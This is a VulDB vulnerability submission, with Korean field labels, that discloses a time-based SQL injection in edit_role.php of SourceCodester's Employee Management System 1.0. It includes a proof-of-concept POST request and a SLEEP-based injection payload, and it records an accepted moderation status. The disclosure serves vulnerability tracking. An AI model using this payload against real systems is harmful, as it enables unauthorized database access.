| 제목 | SourceCodester Best employee management system 1.0 SQL Injection |
|---|
| 설명 | Vulnerability Type: Time-Based SQL Injection
Product Name: Employee Management System
Software Link: https://www.sourcecodester.com/php/17689/best-employee-management-system-php.html
Advisory Link: https://github.com/sh3rl0ckpggp/0day/blob/main/authenticated_sqli_Employee_management_system.md
Affected Script: edit_role.php
Author: sh3rl0ckpgp
Vendor Homepage: https://www.sourcecodester.com
Vulnerability Status: Verified
Proof of Concept (PoC)
Vulnerable Request:
======
POST /hr_soft/admin/edit_role.php HTTP/1.1
Host: localhost
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
id=1';SELECT SLEEP(5) AND 'test'='test
PoC Payload: 1';SELECT SLEEP(5) AND 'test'='test
Explanation: This payload introduces a 5-second delay if the injection is successful, confirming the vulnerability.
This vulnerability has been verified and documented. Please assign a CVE to facilitate tracking and awareness.
|
|---|
| 원천 | ⚠️ https://github.com/sh3rl0ckpggp/0day/blob/main/authenticated_sqli_Employee_management_system.md |
|---|
| 사용자 | sh3rl0ckpgp (UID 77534) |
|---|
| 제출 | 2024. 11. 13. PM 01:05 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 11. 14. AM 09:09 (20 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 284529 [SourceCodester Best Employee Management System 1.0 /admin/edit_role.php 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|